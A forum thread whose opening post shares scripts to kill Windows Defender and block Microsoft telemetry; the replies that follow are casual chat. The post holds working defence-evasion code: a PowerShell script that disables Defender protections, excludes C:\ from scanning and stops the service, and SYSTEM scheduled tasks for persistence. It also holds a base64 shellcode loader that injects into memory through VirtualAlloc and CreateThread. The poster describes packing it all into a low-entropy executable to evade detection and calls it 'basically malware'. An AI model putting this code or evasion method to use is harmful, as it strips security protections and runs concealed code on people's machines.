User Controls

Windows Defender is the worst and i'm going to kill it.

  1. #1
    Sophie Pedophile Tech Support
    That's right it's another issue of Sophie's Cyber Shenanigans[Anti Telemetry(Again!) and More!] Edition. With even more scripts, more flavor text, and the best part is i did all the boring stuff for you so you don't have to.


    Ever want to write malware, exploits, a crypter or what have you and not have Micrococks have a copy of your source and final product before you even have your C2 online? Yeah? Well first of all use Windows Server 2016 Enterprise Edition and configure it properly when installing. Or get the Windows Deployment Kit for a custom Win10 install. But protip just running Win2016 Enterprise is easiest and works best IMO.

    However ain't nobody got time for that and you already have your Win10 box and you want to use that one, i feel you.

    If you're a skid and just want to download some hacking tools and start blasting but can't because WinDefend keeps quarantining everything as either potential malware, hacking tool, and/or PUP.
    Or if you are a casual user, you might like Micrococks not to have all your data by ways of telemetry. I posted a thread with scripts and source to kill telemetry and for a Windows Service in C++ to automate the whole lot here in T&T as well, but no need to open another tab, i gotchu fam.

    Both with a lot of telemetry and automated housekeeping that Windows does, Windows Defender is responsible for the most egregious shit. Hence the title of the thread. I wrote this script to rectify some of that.

    ##-!NOTICE!-##
    # You may want to give this a look over if you simply want to maim
    # not kill Windows Defender

    Write-Host "[+]If you don't know what you're doing, stop executing this script." -f 'gre'
    Read-Host "If you do know, press any key to continue..." -f 'gre'

    try {
    New-Item -Path 'HKLM:\SOFTWARE\Policies\Microsoft'-Name "Windows Defender" -Force -ea 0 | Out-Null
    # Pretty self explanatory
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # This is the kind of shit Windows gets up to when it thinks you're idling
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableRoutinelyTakingAction" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Spynet? No, doesn't seem suspicious to me guvner, honest
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SpyNetReporting" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # Windows assumes consent, don't touch my freaking samples bro. Not cool
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" -Name "SubmitSampleConsent" -Value 0 -PropertyType DWORD -Force -ea 0 | Out-Null
    # No one needs to know...
    New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\MRT" -Name "DontReportInfectionInformation" -Value 1 -PropertyType DWORD -Force -ea 0 | Out-Null
    # These features can die in a fire, look it over in case you'd like to comment
    # out some lines if you wanna play it safe, i like living on the edge
    if (-Not ((GetWmiObject -class Win32 OperatingSystem).Version -eq "6.1.7601")) {
    Add-MpPreference -ExclusionPath "C:\" -Force -ea 0 | Out-Null
    Set-MpPreference -DisableArchiveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBehaviorMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableBlockAtFirstSeen $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableCatchupQuickScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIntrusionPreventionSystem $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableIOAVProtection $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRealTimeMonitoring $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRemovableDriveScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableRestorePoint $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScanningNetworkFiles $true -Force -ea 0 | Out-Null
    Set-MpPreference -DisableScriptScanning $true -Force -ea 0 | Out-Null
    Set-MpPreference -EnableControlledFolderAcces Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -EnablenetworkProtection AuditMode -Force -ea 0 | Out-Null
    Set-MpPreference -MAPSReporting Disabled -Force -ea 0 | Out-Null
    Set-MpPreference -SubmitSampleConsent NeverSend -Force -ea 0 | Out-Null
    Set-MpPreference -PUAProtection Disabled -Force -ea 0 | Out-Null
    }
    } catch {
    Write-Warning "Failed to disable Windows Defender component"
    }

    # If this errors out you either don't have the right permissions or the service has already been stopped
    try {
    Get-Service WinDefend | Stop-Service -Force
    Set-itemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\services\Windefend" -name "Start" -Value 4 -Type DWORD -Force

    } catch {
    Write-Warning "Failed to disable WinDefend Service"

    }


    Make a text file and paste the code block. Save it as something like windef.ps1.

    I would recommend running this as at least a Domain Admin, or straight up NT AUTHORITY\System if you can. A simple way to do that(Kinda) is to create a scheduled task and set it to run at startup as the SYSTEM user. The commands for doing so would look a lot like this


    schtasks /create /tn 'windef' /tr powershell %WINDIR%\windev.ps1 /sc onstart /ru System


    Change the details as necessary.

    If you want to take this a step further save the following as a .bat file and run it as administrator. This script was apart of the original ensemble i had in a previous anti-telemetry thread


    @ECHO OFF
    SETLOCAL

    echo Uninstalling updates relevant to telemetry ops
    echo Delete KB2902907 (Microsoft Security Essentials)
    start "title" /b /wait wusa.exe /kb:2902907 /uninstall /quiet /norestart

    echo Delete KB3022345 (telemetry)
    start "title" /b /wait wusa.exe /kb:3022345 /uninstall /quiet /norestart

    echo Delete KB3068708 (telemetry)
    start "title" /b /wait wusa.exe /kb:3068708 /uninstall /quiet /norestart

    echo Delete KB3080149 (Telemetry)
    start "title" /b /wait wusa.exe /kb:3080149 /uninstall /quiet /norestart


    In order to be thorough and have a good use for another older script of mine we'll be blocking domains Micro$oft runs in order to receive things like telemetry and samples.

    Ideally you would blacklist these in your router. Alternatively we can basically null-route them for all intents and purposes at the OS Networking level. What we will need is a BlackHole server, a Proxy Auto Config script, and a web server to serve the proxy config locally.

    Here's my implementation of a HTTP server in powershell.

    # PowerShell RegEdit and HTTP Server
    $registryPath = "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\"

    $Name = "EnableLegacyAutoProxyFeatures"

    $value = "1"

    # Check to see if an entry exists and set value
    # If it doesn't create the appropriate subkey
    if(!(Test-Path $registryPath)) {
    New-Item -Path $registryPath -Force | Out-Null
    New-ItemProperty -Path $registryPath -Name $name -Value $value `

    -PropertyType DWORD -Force | Out-Null
    }

    else {
    New-ItemProperty -Path $registryPath -Name $name -Value $value `
    -PropertyType DWORD -Force | Out-Null
    }

    # Http Server
    $http = [System.Net.HttpListener]::new()

    # Listen at 8080
    $http.Prefixes.Add("http://localhost:8080/")

    # Start the Http Server
    $http.Start()


    # Confirm
    if ($http.IsListening) {
    write-host " HTTP Server Listening " -f 'gre'
    write-host " Please direct Windows Auto Proxy Config to http://127.0.0.1/:8080 " -f 'gre'
    }


    # Server Loop
    while ($http.IsListening) {

    $context = $http.GetContext()

    if ($context.Request.HttpMethod -eq 'GET' -and $context.Request.RawUrl -eq '/') {

    # Log to terminal
    write-host "$($context.Request.UserHostAddress) => $($context.Request.Url)" -f 'gre'

    # Get proxy.pac data
    # Don't forget to change this to reflect the situation at your end
    [string]$data = Get-Content "C:\some\path\proxy.pac" -Raw

    # Field the request
    $buffer = [System.Text.Encoding]::UTF8.GetBytes($data)
    $context.Response.ContentLength64 = $buffer.Length
    $context.Response.OutputStream.Write($buffer, 0, $buffer.Length) # Data stream
    $context.Response.OutputStream.Close() # Close

    }


    Proxy Auto Config Scripts have to be in JavaScript. I have made some adjustments to this one with regards to the one i had in my other thread. Basically we're not going to bother routing normal traffic through tor this time.

    script type="application/x-ns-proxy-autoconfig">

    // Declare vars
    var normal = "DIRECT";
    var blackhole = "PROXY 127.0.0.1:55555";

    function FindProxyForURL(url, host) {

    if (dnsResolve(host) || shExpMatch(host, '*.local')
    || isInNet(dnsResolve(host), '10.0.0.0', '255.0.0.0')
    || isInNet(dnsResolve(host), '172.16.0.0', '255.240.0.0')
    || isInNet(dnsResolve(host), '192.168.0.0', '255.255.0.0')
    || isInNet(dnsResolve(host), '127.0.0.0', '255.255.255.0')) {
    return normal;
    }

    if (shExpMatch((url, "*oca.telemetry.microsoft.com*")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com*")
    || shExpMatch(url, "*oca.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*a-0001.a-msedge.net*")
    || shExpMatch(url, "*a-0002.a-msedge.net*")
    || shExpMatch(url, "*a-0003.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0004.a-msedge.net*")
    || shExpMatch(url, "*a-0005.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0006.a-msedge.net*")
    || shExpMatch(url, "*a-0007.a-msedge.net*")
    || shExpMatch(url, "*a-0008.a-msedge.net*")
    || shExpMatch(url, "*a-0009.a-msedge.net*")
    || shExpMatch(url, "*i1.services.social.microsoft.com")
    || shExpMatch(url, "*telecommand.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.df.telemetry.microsoft.com*")
    || shExpMatch(url, "telemetry.appex.bing.net*")
    || shExpMatch(url, "*settings-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*pre.footprintpredict.com")
    || shExpMatch(url, "*aidps.atdmt.com*")
    || shExpMatch(url, "*aka-cdn-ns.adtech.de*")
    || shExpMatch(url, "*a-msedge.net*")
    || shExpMatch(url, "*b.rad.msn.com*")
    || shExpMatch(url, "*az361816.vo.msecnd.net*")
    || shExpMatch(url, "*b.ads1.msn.com*")
    || shExpMatch(url, "*b.ads2.msads.net*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com*")
    || shExpMatch(url, "*wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*bs.serving-sys.com*")
    || shExpMatch(url, "*redir.metaservices.microsoft.com*")
    || shExpMatch(url, "*reports.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*cs1.wpc.v0cdn.net*")
    || shExpMatch(url, "*corpext.msitadfs.glbdns2.microsoft.comt*")
    || shExpMatch(url, "*df.telemetry.microsoft.com*")
    || shExpMatch(url, "*services.wes.df.telemetry.microsoft.com*")
    || shExpMatch(url, "*watson.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com*")
    || shExpMatch(url, "*sqm.telemetry.microsoft.com.nsatc.net*")
    || shExpMatch(url, "*watson.ppe.telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.microsoft.com*")
    || shExpMatch(url, "*telemetry.urs.microsoft.com*")
    || shExpMatch(url, "*survey.watson.microsoft.com*")
    || shExpMatch(url, "*watson.live.com*")
    || shExpMatch(url, "*vortex-sandbox.data.microsoft.com*")
    || shExpMatch(url, "*settings-win.data.microsoft.com*")
    || shExpMatch(url, "*watson.microsoft.com*")
    || shExpMatch(url, "*db3aqu.atdmt.com*")
    || shExpMatch(url, "*diagnostics.support.microsoft.com*")
    || shExpMatch(url, "*statsfe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*fe2.update.microsoft.com.akadns.net*")
    || shExpMatch(url, "*schemas.microsoft.akadns.net*")
    || shExpMatch(url, "*feedback.microsoft-hohm.com*")
    || shExpMatch(url, "*feedback.search.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*statsfe1.ws.microsoft.com*")
    || shExpMatch(url, "*c.atdmt.com*")) {
    // This list may be incomplete and/or slightly outdated
    // TODO: Fix that
    return blackhole;

    } else {
    return normal;
    }
    }
    </script>


    For a perfectly adequate blackhole server, pip has you covered. If you have the Python interpreter and pip installed you can use the following commands to grab the server in question.
    pip install tcp_blackhole


    Easy. When you're invoking the script either through 'python -m tcp_blackhole.py' or by calling it from a different script/utility make sure the argument for http mode is set to True. And set the port argument to 55555. So that it's commensurate with the PAC Script

    To persist this state of affairs once everything is in place, another scheduled task may be in order.
    schtasks /create /tn 'StageProxyOps' /tr powershell %WINDIR%\HTTP-Proxy-Server.ps1 /sc onstart /ru System


    Which reminds me, if you want to try something a little more pro-active with regards to the script that kill WinDefender i generated the following

    Set-StrictMode -Version 2
    $dQA = @"
    using System;
    using System.Runtime.InteropServices;
    namespace c5qI1 {
    public class func {
    [Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
    [Flags] public enum MemoryProtection { ReadWrite = 0x04, Execute= 0x10 }
    [Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
    [DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")] public static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, int flNewProtect,out int lpflOldProtect);
    [DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
    }
    }
    "@

    $g_ = New-Object Microsoft.CSharp.CSharpCodeProvider
    $kp_ = New-Object System.CodeDom.Compiler.CompilerParameters
    $kp_.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
    $kp_.GenerateInMemory = $True
    $qwx = $g_.CompileAssemblyFromSource($kp_, $dQA)

    [Byte[]]$gycNB = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1qAY2FsgAAAFBoMYtvh//Vu/C1olZoppW9nf/VPAZ8CoD74HUFu0cTcm9qAFP/1XBvd2Vyc2hlbGwgLU5vUCAtZXhlYyBieXBhc3MgLlwlV0lORElSJVx3aW5leGVjMi5wczEA")
    [Uint32]$h9koM = 0

    $vnJp = [c5qI1.func]::VirtualAlloc(0, $gycNB.Length + 1, [c5qI1.func+AllocationType]::Reserve -bOr [c5qI1.func+AllocationType]::Commit, [c5qI1.func+MemoryProtection]::ReadWrite)
    if ([Bool]!$vnJp) { $global:result = 3; return }
    [System.Runtime.InteropServices.Marshal]::Copy($gycNB, 0, $vnJp, $gycNB.Length)

    if ([c5qI1.func]::VirtualProtect($vnJp,[Uint32]$gycNB.Length + 1, [c5qI1.func+MemoryProtection]::Execute, [Ref]$h9koM) -eq $true ) {
    [IntPtr] $yU_ = [c5qI1.func]::CreateThread(0,0,$vnJp,0,0,0)
    if ([Bool]!$yU_) { $global:result = 7; return }
    $nQ_ = [c5qI1.func]::WaitForSingleObject($yU_, [c5qI1.func+Time]::Infinite)
    }


    As you can see this powershell script has inline C#, that's to build a special DLL that will mimic kernel32 DLL, but for our ends. Kernel32.dll in short is involved with memory management, I/O, and it's process lives in kernelland. Which is good. A bit further down you can see a Base64 encoded string, this is actually encoded shellcode and we're going to use functions imported from kernel32.dll to inject that shellcode(once decoded) into memory using the CreateRemoteThread Method. Once injected it's going to fire off the equivalent of this command: powershell -NoP -exec bypass -c .\%WINDIR%\windef.ps1.

    As you can tell it's going to assume the WinDefKiller script lives in the %WINDIR% and is called windef.ps1. The point being that when done like this you won't be running the script from your user context but it will run in the context of the process doing the invoking.

    Anyway i was bored so i made some things i made some stuff to drop the WinDefKiller script in it's expected spot, automatically launch it through the script you see above and on top of that also add a scheduled task. then i put it all together into one big beautiful executable and padded the executable out to the point of low entropy in order to fly under the radar while Windows Defender still lives. It's basically malware, so if you are feeling adventerous shoot me a message and i may send you a precompiled executable. For fully automated Windows Defender murdering madness.

    Here's what it looks like on the inside:



    Anyway i hope you found all that at least somewhat informative, but mostly useful. I genuinely despise the way Micro$oft goes about these things. Unfortunately I'm gonna have to make a new edition of this thread for Windows 11 pretty soon, i think.
    The following users say it would be alright if the author of this post didn't die in a fire!
  2. #2
    aldra JIDF Controlled Opposition
    I forgot how goofy powershell syntax is
  3. #3
    Sophie Pedophile Tech Support
    Originally posted by aldra I forgot how goofy powershell syntax is

    Mandatory capitalization grinds my gears tbh.
  4. #4
    deathgrips Yung Blood
    But protip just running Win2016 Enterprise is easiest and works best IMO.
    Ever tried LTSB/LTSC? I prefer it because you have all the group policy options of enterprise but more stability/less updates/less feature changes. More stable and less shit to deal with.
    I avoid Windows at all costs but when I work with it I always have to have enterprise or ltsc so I can actually turn off telemetry.
    Btw for anyone lurking there's plenty of good powershell scripts on github that can block telemetry, remove windows store bloatware apps (i.e xbox app etc) and increase security on the home/professional versions.
  5. #5
    aldra JIDF Controlled Opposition
    Originally posted by Sophie Mandatory capitalization grinds my gears tbh.

    it's more just how long and verbose everything is that gets me

    it almost encourages you to just tab > autocomplete everything and constantly fuck up



    Originally posted by deathgrips Ever tried LTSB/LTSC? I prefer it because you have all the group policy options of enterprise but more stability/less updates/less feature changes. More stable and less shit to deal with.

    try core deployment, takes a bit of work to get set up but you can choose what 'features' to install in the first place
  6. #6
    Sophie Pedophile Tech Support
    Originally posted by aldra it's more just how long and verbose everything is that gets me

    it almost encourages you to just tab > autocomplete everything and constantly fuck up

    Maybe it's because i started out with Python instead of a lower level language that i don't mind the verbosity so much. It also depends on what you're trying to do with your script. Setting preferences in example, are generally more verbose in syntax than writing a server.




    Originally posted by aldra try core deployment, takes a bit of work to get set up but you can choose what 'features' to install in the first place

    Definitely worth it if you take the time to do it, a lot better than LTSC. Plus LTSC has a full suite of up to date security tooling from Micro$oft, which as explored in this thread is problematic, as embedded within those are a lot of telemetry features.

    Also to address one more thing, of course there are PowerShell scripts on Github that help improve the privacy of the user. I know, because i've posted a number, through multiple accounts i keep for various reasons and via organizations and collaborations with other OSS devs interested in this kind of thing. Personally though i like to keep the more, not so much experimental, but unorthodox methods to a select group of individuals. Which is for the most part to discuss my work, provide some insight and hopefully have some insight provided to me as well if and where i've made a mistake or there is a better way to do it. I write these threads as much to learn for myself as i hope to inform others. And i think that's the right mindset we ought to take in the broader context of collaborative development and research.
  7. #7
    cigreting Dark Matter
    can u fix y my printers not workin
  8. #8
    Sophie Pedophile Tech Support
    Originally posted by cigreting can u fix y my printers not workin

    I'm not actually tech support.
  9. #9
    cigreting Dark Matter
    oh oke
Jump to Top